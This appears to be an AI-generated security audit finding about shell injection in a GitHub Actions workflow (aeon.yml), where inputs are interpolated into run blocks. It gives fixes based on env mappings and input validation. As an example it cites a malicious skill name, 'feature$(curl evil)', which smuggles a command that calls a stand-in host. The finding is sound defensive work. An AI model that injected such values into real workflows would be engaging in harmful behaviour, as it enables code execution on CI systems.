Opus finding
Skill-name template interpolation in `run:` blocks enables shell injection from workflow_dispatch inputs
highsecurityhigh
- .github/workflows/aeon.yml:81-82
- .github/workflows/aeon.yml:120-122
- .github/workflows/aeon.yml:174-175
- .github/workflows/aeon.yml:254-256
- .github/workflows/aeon.yml:260-262
Many `run:` blocks embed `${{ inputs.skill }}`, `${{ inputs.model }}`, `${{ inputs.var }}`, and `${{ steps.skill.outputs.name }}` directly into bash script bodies via GitHub Actions template substitution. Although workflow_dispatch requires write access to trigger by default, GitHub published guidance treats template injection in run blocks as a class of risk because (a) the values are substituted before bash quoting, (b) the workflow also accepts `workflow_call` from other workflows, and (c) a malicious skill name like `feature$(curl evil)` would execute. The `Determine skill` step uses `echo "name=${{ inputs.skill }}" >> "$GITHUB_OUTPUT"` which is the canonical injection pattern — a value with newlines can inject arbitrary GITHUB_OUTPUT keys, and a value with `$(...)` is executed by bash. This is the well-known 'untrusted input in run script' anti-pattern.
Recommendation
Move all `${{ inputs.* }}` and `${{ steps.*.outputs.* }}` values into `env:` mappings on each step and reference them as `$SKILL` / `$INPUT_MODEL` etc. Validate skill name against `^[a-zA-Z0-9_-]+$` in the Determine skill step.